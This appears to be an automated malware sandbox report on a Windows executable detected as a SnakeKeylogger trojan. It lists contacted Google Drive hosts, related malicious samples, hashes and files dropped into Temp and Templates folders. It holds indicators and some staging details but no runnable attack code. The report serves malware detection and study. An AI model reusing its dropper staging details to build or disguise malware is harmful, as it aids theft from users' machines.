      TEC-SPC-94.03.60.175.07.exe58%ReversingLabsWin32.Trojan.SnakeKeylogger

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.19.174
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.181.1
        		truefalse
          		high
          s-part-0035.t-0009.t-msedge.net
          		13.107.246.63
          		truefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.comTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.usercontent.google.com/TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000002.3509649051.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3069029296.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564228643.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3314199552.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564290457.0000000006931000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618278295.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3340844368.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2510326046.000000000695A000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.000000000692C000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://apis.google.comTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://drive.usercontent.google.com/0ETEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.0000000006974000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://nsis.sf.net/NSIS_ErrorErrorTEC-SPC-94.03.60.175.07.exe, 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000000.00000000.2244470500.0000000000409000.00000008.00000001.01000000.00000003.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000000.2349658011.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://translate.google.com/translate_a/element.jsTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2509982030.000000000695A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.usercontent.google.com/N9p5ty5miFE834NBt4YyP-eTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3096442008.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.0000000006973000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://drive.google.com/TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://drive.google.com/GjTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://drive.google.com/gjhTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564228643.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2675852012.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2564290457.0000000006931000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2618278295.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2848978073.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2591570231.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.google.com/wjxTEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2986887003.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3014625504.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3069029296.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2820381439.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2903416127.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2764525900.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3150350953.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2848978073.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2705231346.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.2930905111.000000000692C000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3042035030.000000000692C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://drive.usercontent.google.com/hETEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3395018321.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3422500370.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3314199552.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3476961315.0000000006975000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3205829520.0000000006973000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3232423623.0000000006970000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3448946981.0000000006974000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3260063023.0000000006970000.00000004.00000020.00020000.00000000.sdmp, TEC-SPC-94.03.60.175.07.exe, 00000002.00000003.3178271864.0000000006973000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    142.250.181.1
                                    		drive.usercontent.google.comUnited States
                                    		15169GOOGLEUSfalse
                                    172.217.19.174
                                    		drive.google.comUnited States
                                    		15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1576272
                                    Start date and time:2024-12-16 17:56:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 56s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:6
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:TEC-SPC-94.03.60.175.07.exe
                                    Detection:MAL
                                    Classification:mal68.troj.evad.winEXE@3/10@2/2
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 90%
                                    • Number of executed functions: 48
                                    • Number of non-executed functions: 76
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target TEC-SPC-94.03.60.175.07.exe, PID 4420 because there are no executed function
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: TEC-SPC-94.03.60.175.07.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    11:57:38API Interceptor18x Sleep call for process: TEC-SPC-94.03.60.175.07.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-part-0035.t-0009.t-msedge.netSmple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    BG75-10-01_CurrencyTransfer__530_24_00002559_Processed.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63
                                    JIKJCBEX.exeGet hashmaliciousLummaCBrowse
                                    • 13.107.246.63
                                    LKKWDUFD.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.246.63

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    InvoiceNr274728.pdf.lnkGet hashmaliciousLummaCBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    njrtdhadawt.exeGet hashmaliciousStealc, VidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    T0x859fNfn.exeGet hashmaliciousVidarBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    InvoiceNr274728.pdf.lnkGet hashmaliciousUnknownBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174
                                    A6IuJ5NneS.lnkGet hashmaliciousLummaCBrowse
                                    • 142.250.181.1
                                    • 172.217.19.174

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dllPurchase-Order27112024.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      563299efce875400a8d9b44b96597c8e-sample (1).zipGet hashmaliciousUnknownBrowse
                                        debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                          debit-note-19-08-dn-2024.exeGet hashmaliciousGuLoaderBrowse
                                            HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                              HE9306_AWBLaser_Single240812144358.exeGet hashmaliciousGuLoaderBrowse
                                                z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                  z41_EX24-772_24.exeGet hashmaliciousGuLoaderBrowse
                                                    _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exeGet hashmaliciousGuLoaderBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\BooConf.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):45
                                                        Entropy (8bit):4.7748605961854445
                                                        Encrypted:false
                                                        SSDEEP:3:FR3tWAAQLQIfLBJXlFGfv:/ktQkIPeH
                                                        MD5:8B9FC0443D7E48145E2D4B37AFB2D37B
                                                        SHA1:64A5718A478A38AC262D2E46DA81D0E88C122A0F
                                                        SHA-256:4F743978EAD44260F895C983689D718E31CA826161C447D205021A9D3E010AFA
                                                        SHA-512:5126DA1D29F662465241C8B51B95783DF3F88C8FEB8BB1B65DCF354738C48AAB4BFB6C0035DFE6B40FA03AE5AABA8F72F1C31343AEC7D4EDB9C6EBCC773CC3D3
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:[ReBoot]..Ac=user32::EnumWindows(i r2 ,i 0)..

                                                        C:\Users\user\AppData\Local\Temp\nsnE9D6.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1209210
                                                        Entropy (8bit):3.388632053264602
                                                        Encrypted:false
                                                        SSDEEP:6144:GP7npYBciqq2hO/JcKBk4JMY5mTXWwxv4QH5m/o/MWV9gZrp0AJ2aJ4aKh:GP7C1Bk4krWw94QH4/o0WMcPh
                                                        MD5:848CBF8E8503F5DCE77C15B6EAE975B8
                                                        SHA1:E29E73856E80705B12D535D9F5711FB387957EE4
                                                        SHA-256:B903E3DF94CA281294E2316738C3C10E3F93529C715D3796AA2081E790EF5983
                                                        SHA-512:4CCCE79C6D952029B8F5AB71C719E71469434FD6AD539D187FE18E031F0D0169616D96B5A4F53E9F30F8EA4FB908E70F6F44943C6942E0BB14CA4622F8D56C3A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:b.......,...................[...................b...........................................................................................................................................................................................................................................G...J...........c...j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.656006343879828
                                                        Encrypted:false
                                                        SSDEEP:192:eP24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlbSl:T8QIl975eXqlWBrz7YLOlb
                                                        MD5:3E6BF00B3AC976122F982AE2AADB1C51
                                                        SHA1:CAAB188F7FDC84D3FDCB2922EDEEB5ED576BD31D
                                                        SHA-256:4FF9B2678D698677C5D9732678F9CF53F17290E09D053691AAC4CC6E6F595CBE
                                                        SHA-512:1286F05E6A7E6B691F6E479638E7179897598E171B52EB3A3DC0E830415251069D29416B6D1FFC6D7DCE8DA5625E1479BE06DB9B7179E7776659C5C1AD6AA706
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: Purchase-Order27112024.scr.exe, Detection: malicious, Browse
                                                        • Filename: 563299efce875400a8d9b44b96597c8e-sample (1).zip, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                        • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                        • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                        • Filename: _EX24-772_24341300EX00314559_ARI TEKST#U0130L_KontrolCiktisiEkliListe.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\tmc.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):28
                                                        Entropy (8bit):4.110577243331642
                                                        Encrypted:false
                                                        SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                        MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                        SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                        SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                        SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:[Access]..Setting=Disabled..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Impieties200.bjr

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):207998
                                                        Entropy (8bit):1.2479248406208852
                                                        Encrypted:false
                                                        SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                        MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                        SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                        SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                        SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Maxillary.Gal

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):27598
                                                        Entropy (8bit):4.570583675091086
                                                        Encrypted:false
                                                        SSDEEP:384:u19PboBFKSqS40INMIETbU9nHCa5b8ICaFDlnC/8pf+G6FPEd:uTPbF9mIGW98I/+JGqP6
                                                        MD5:23E566226854C7E77201E9D814ACAF99
                                                        SHA1:A801A3BBCAC3CB626EA4EBD1AC14554134CE8802
                                                        SHA-256:9EA4CFCE59BC6444A4FC09F23C0249625F395A802D48DFBAEBEDEE6FCC3117D2
                                                        SHA-512:FC026879C1DB8AF906720FB54796FDF8E6B31AE89BB5516FA6CB4A2D6ED61729274B4974627AC7406E72BAD69F8717019FC7F1826B25387588089E25D363D88E
                                                        Malicious:false
                                                        Preview:......................................................A.....|.....ww.l..................V...m..ooo..NNN.....z........XX.....|..........................N.777.f.........%..3..{{{{...o...............VVV.d...................f.............FFF....4.C.................+...N......O.......................................E..........bb...._............(......6..............+........=...-..............\.LLLL...,..........$........................Y..\\...99...................>.......___...............k.....ee.YY.........///..Z...JJJJ..v.].n.............(.....p...........DDDD.......................>>......##...................L.....9.V..............ee....?...:........L.........................."............TT..........dd.....g.........yyy.~..............ccc....ZZZ...~.Q...Z...................uuuuuu................11.............rr...VVVVV......_............1111.8.....tt.......................oo..........ll.......-..m...................x......HHHH.........>>>.Z..........................m..............

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\Watermelons.Lar37

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):301225
                                                        Entropy (8bit):7.52936284400769
                                                        Encrypted:false
                                                        SSDEEP:6144:qpYBciqq2hO/JcKBk4JMY5mTXWwxv4QH5m/o/MW2:h1Bk4krWw94QH4/o0W2
                                                        MD5:36B62BD81B795DDB447F1F7FEF6911CE
                                                        SHA1:55957B36A367990AC390D84FE18520B395740D9D
                                                        SHA-256:4ECF52E1007A0245DA1F6841CFF28A48B69C56D59221FFE20A0736C911C8B615
                                                        SHA-512:16F793819A6C55F8A7CEF439B517648AED1EE31429D120E64B18D8FA66AE80B79CD879F3DA78E33B7F9F3151516D52B02F4F6D53AE8A56661EE5247CA2A20C78
                                                        Malicious:false
                                                        Preview:.............................ccc.........[...&&.222...........D.SSS......66.X.....H.......................].....;.........GG........""..................T.......................L....C....._.................E.@@..b.........^^..qq.........................7..f...(.......\\\...........................................?..........@...........k......z....X...........YY.................5......Q.......PPP.......ee.M.k.....qq.....K...........g....;...G...AAA.....00..............F...\\\\.........................\......................ooo..mm.....c.....Q.4..............KKK......vv...d.............oooo..........%..........""...n....g.ddddd.......*..........................*.O...._..zz................................q.o............++...k.....Q........[............+..n................##.v....&&.....&.................................999.........22..............:........,,,...................mmmmm......................^^^^......}}......2...bbb...g...>>>>.....000......a........=...a................+++++..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\firsaarsfdselsdags.luv

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):443489
                                                        Entropy (8bit):1.2463028275519636
                                                        Encrypted:false
                                                        SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                        MD5:913964ACDFFFA24344A401D48E08C653
                                                        SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                        SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                        SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                        Malicious:false
                                                        Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy\portitor.win

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):209062
                                                        Entropy (8bit):1.2469617066336303
                                                        Encrypted:false
                                                        SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                        MD5:607886D87859E45164D2959809AB5367
                                                        SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                        SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                        SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                        Malicious:false
                                                        Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..

                                                        C:\Users\user\subacidity.lnk

                                                        Download File
                                                        Process:C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe
